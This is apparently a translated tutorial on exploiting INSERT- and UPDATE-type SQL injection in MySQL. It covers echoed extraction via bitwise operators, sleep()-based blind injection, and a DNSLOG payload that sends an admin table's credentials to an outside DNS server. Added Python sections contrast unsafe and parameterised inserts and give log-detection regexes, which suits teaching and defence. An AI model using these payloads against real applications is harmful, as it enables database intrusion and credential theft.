0x00 Preface
A summary of the ways INSERT- and UPDATE-type SQL injection can be exploited.
0x01 INSERT and UPDATE type
1. Injection with echoed output
Both integer-type and string-type injection points retrieve data with the bitwise OR (|) and bitwise XOR (^) operators.
If the value being spliced onto is 0, bitwise OR can be used to display the queried data; if it is not 0 (take 100 as an example), bitwise XOR displays the result of the operation, and XOR-ing that result once more with the same value recovers the queried data.
Note that the queried data is passed through hex(); if the resulting value exceeds MySQL's bigint maximum (9223372036854775807), every retrieved value will be 9223372036854775807, and the data must then be fetched in segments with substr() or similar.
# integer type: bitwise OR
mysql> insert into ctf values (0 | (select hex(database())),'0','test','0');
Query OK, 1 row affected, 1 warning (0.03 sec)
mysql> select * from ctf;
+----------+----------+-----------+------+
| userid | username | signature | mood |
+----------+----------+-----------+------+
| 74657374 | 0 | test | 0 |
+----------+----------+-----------+------+
1 row in set (0.00 sec)
mysql> select unhex(74657374);
+-----------------+
| unhex(74657374) |
+-----------------+
| test |
+-----------------+
1 row in set (0.00 sec)
# integer type: bitwise XOR
mysql> insert into ctf values (100 ^ (select hex(database())),'0','test','0');
Query OK, 1 row affected, 1 warning (0.03 sec)
mysql> select * from ctf;
+----------+----------+-----------+------+
| userid | username | signature | mood |
+----------+----------+-----------+------+
| 74657338 | 0 | test | 0 |
+----------+----------+-----------+------+
1 row in set (0.00 sec)
mysql> select unhex(100^74657338);
+---------------------+
| unhex(100^74657338) |
+---------------------+
| test |
+---------------------+
1 row in set (0.00 sec)
# string type: bitwise OR
mysql> insert into ctf values (100 ,'0'| (select hex(database())) ,'test','0');
Query OK, 1 row affected (0.02 sec)
mysql> select * from ctf;
+--------+----------+-----------+------+
| userid | username | signature | mood |
+--------+----------+-----------+------+
| 100 | 74657374 | test | 0 |
+--------+----------+-----------+------+
1 row in set (0.00 sec)
mysql> select unhex(74657374);
+-----------------+
| unhex(74657374) |
+-----------------+
| test |
+-----------------+
1 row in set (0.00 sec)
# string type: bitwise XOR
mysql> insert into ctf values (100 ,'100' ^ (select hex(database())) ,'test','0');
Query OK, 1 row affected (0.03 sec)
mysql> select * from ctf;
+--------+----------+-----------+------+
| userid | username | signature | mood |
+--------+----------+-----------+------+
| 100 | 74657338 | test | 0 |
+--------+----------+-----------+------+
1 row in set (0.00 sec)
mysql> select unhex('100'^74657338);
+-----------------------+
| unhex('100'^74657338) |
+-----------------------+
| test |
+-----------------------+
1 row in set (0.00 sec)
The other operators that have an inverse (+, -, *, /) can be used in the same way to retrieve queried data. Because a logical operation yields only 1 or 0, or, ||, xor, && and and cannot be used directly in injection cases where the data is echoed.
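The bitwise-OR extraction above only works because the attacker-controlled value is spliced into the SQL text. As an added example that is not part of the original post, the following Python script reproduces the integer-type | trick against an in-memory SQLite table (the constructed ctf schema and the sqlite_master subquery are stand-ins for the MySQL table and database()), and then shows that type validation plus parameter binding rejects the same input before any SQL runs, and stores a payload placed in a string field as inert text.

```python
import sqlite3

# Constructed stand-in for the post's "ctf" table. Columns are declared without types so
# SQLite stores exactly what the statement produced (no affinity conversion).
SCHEMA = "CREATE TABLE ctf (userid, username, signature, mood)"

# The post's integer-type bitwise-OR payload transposed to SQLite: the table name in
# sqlite_master plays the role of MySQL's database().
PAYLOAD_INT = "0 | (select hex(name) from sqlite_master)"


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def last_row(conn: sqlite3.Connection):
    return conn.execute(
        "SELECT userid, username FROM ctf ORDER BY rowid DESC LIMIT 1"
    ).fetchone()


def insert_unsafe(userid_raw: str, username: str):
    """Anti-pattern: the 'integer' field is spliced into the SQL text verbatim,
    so any expression in it is evaluated by the database."""
    conn = fresh_db()
    conn.execute(f"INSERT INTO ctf VALUES ({userid_raw}, '{username}', 'test', '0')")
    return last_row(conn)


def insert_safe(userid_raw: str, username: str):
    """Validate the type first, then bind both values as parameters: neither one
    ever becomes part of the SQL text."""
    userid = int(userid_raw)  # ValueError for anything that is not an integer literal
    conn = fresh_db()
    conn.execute("INSERT INTO ctf VALUES (?, ?, 'test', '0')", (userid, username))
    return last_row(conn)


def compare(userid_raw: str, username: str = "0"):
    """Run one input through both paths. Returns (unsafe_row, safe_row), where
    safe_row is None if the safe path rejected the input before any SQL ran."""
    unsafe = insert_unsafe(userid_raw, username)
    try:
        safe = insert_safe(userid_raw, username)
    except ValueError:
        safe = None
    return unsafe, safe


if __name__ == "__main__":
    print(compare("100"))               # ((100, '0'), (100, '0'))
    print(compare(PAYLOAD_INT))         # ((637466, '0'), None): hex('ctf') leaked vs. rejected
    print(compare("100", PAYLOAD_INT))  # bound as text, the payload is stored verbatim
```

The integer 637466 in the unsafe row is hex('ctf') read back through the | operator, exactly the 74657374 seen for hex('test') in the MySQL session; the safe path never reaches the database with that input, and when the same payload arrives in the string field it is stored as a literal rather than evaluated.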
2. Time-based blind injection
Integer-type time-based blind injection points
and, &&, or, ||, xor can all be used to splice in the SQL. As the runs below show, the integer in front of and/&& must not be 0, the integer in front of or/|| must not be 1, while xor has no requirement on the preceding integer, so xor is recommended.
mysql> insert into ctf values (0 && sleep(2),'test','test','0');
Query OK, 1 row affected (0.03 sec)
mysql> insert into ctf values (1 && sleep(2),'test','test','0');
Query OK, 1 row affected (2.02 sec)
mysql> insert into ctf values (0 || sleep(2),'test','test','0');
Query OK, 1 row affected (2.03 sec)
mysql> insert into ctf values (1 || sleep(2),'test','test','0');
Query OK, 1 row affected (0.02 sec)
mysql> insert into ctf values (0 xor sleep(2),'test','test','0');
Query OK, 1 row affected (2.09 sec)
mysql> insert into ctf values (1 xor sleep(2),'test','test','0');
Query OK, 1 row affected (2.01 sec)
Integer-type injection points can also use the four arithmetic operators +, -, *, /.
mysql> insert into ctf values (0+sleep(2),'test','test','0');
In addition, the bitwise operators & and | can be used.
mysql> insert into ctf values (0&sleep(2),'test','test','0');
Query OK, 1 row affected (2.02 sec)
mysql> insert into ctf values (0|sleep(2),'test','test','0');
Query OK, 1 row affected (2.02 sec)
String-type time-based blind injection points
or, ||, xor, +, -, *, /, |, & can be used. A string is treated as 0 in a logical operation, so && and and cannot be used.
mysql> insert into ctf values (0,'test' and sleep(2),'test','0');
DNSLOG
1' xor load_file(concat('\\\\\\\\',(select CONCAT_WS('_',admin_id,admin_pass) from met_admin_table where id=1),'.dnslog服务器地址\\abc'))-- -'
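The time-based and DNSLOG variants leave a characteristic shape in a query log: a write statement carrying sleep(), load_file() with a UNC path, or a scalar subquery glued to an operator. As an added example, not from the original post, here is a small Python scanner over constructed lines in the style of MySQL's general query log (the timestamps, thread ids and the reserved .example.invalid hostname are made up); the patterns it looks for are exactly the ones shown in this post.

```python
import re

# Constructed sample in the style of MySQL's general query log (Time Id Command Argument).
# None of these are real captures; the last line reuses the post's DNSLOG shape with a
# reserved placeholder hostname instead of a real dnslog server.
SAMPLE_LOG = r"""
2024-01-01T10:00:01Z   7 Query   insert into ctf values (100,'alice','hello','0')
2024-01-01T10:00:02Z   7 Query   insert into ctf values (1 xor sleep(2),'test','test','0')
2024-01-01T10:00:03Z   7 Query   insert into ctf values (0 | (select hex(database())),'0','test','0')
2024-01-01T10:00:04Z   8 Query   update ctf set mood='1' where userid=100
2024-01-01T10:00:05Z   8 Query   update ctf set mood='1' xor load_file(concat('\\\\\\\\',(select 1),'.example.invalid\\abc')) where userid=100
"""

# One log line: timestamp, thread id, the literal word Query, then the SQL text.
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<thread>\d+)\s+Query\s+(?P<sql>.+)$")
# Only write statements are in scope for this post's techniques.
WRITE_STMT = re.compile(r"^\s*(insert|update)\b", re.I)

RULES = [
    # time-based blind: any sleep() call inside an INSERT/UPDATE
    ("sleep-in-write", re.compile(r"\bsleep\s*\(", re.I)),
    # out-of-band: load_file(concat('\\\\...', ...)) building a UNC path
    ("load_file-unc", re.compile(r"\bload_file\s*\(\s*concat\s*\(\s*'\\{2,}", re.I)),
    # echoed extraction: bitwise or arithmetic operator directly followed by a scalar subquery
    ("subquery-after-operator", re.compile(r"[|^+\-*/]\s*\(\s*select\b", re.I)),
]


def scan(log_text: str):
    """Return (thread_id, [rule names]) for every write statement that trips a rule."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        sql = m.group("sql")
        if not WRITE_STMT.match(sql):
            continue
        hits = [name for name, rx in RULES if rx.search(sql)]
        if hits:
            findings.append((m.group("thread"), hits))
    return findings


if __name__ == "__main__":
    for thread, hits in scan(SAMPLE_LOG):
        print(f"thread {thread}: {', '.join(hits)}")
```

Three of the five constructed lines are flagged, each for a different reason, while the ordinary INSERT and UPDATE pass. The rules are deliberately narrow (a sleep() in a SELECT is not reported here) so that a hit on a write statement is worth an analyst's time; in a real deployment the log source would be the general log or a proxy capture rather than an inline string.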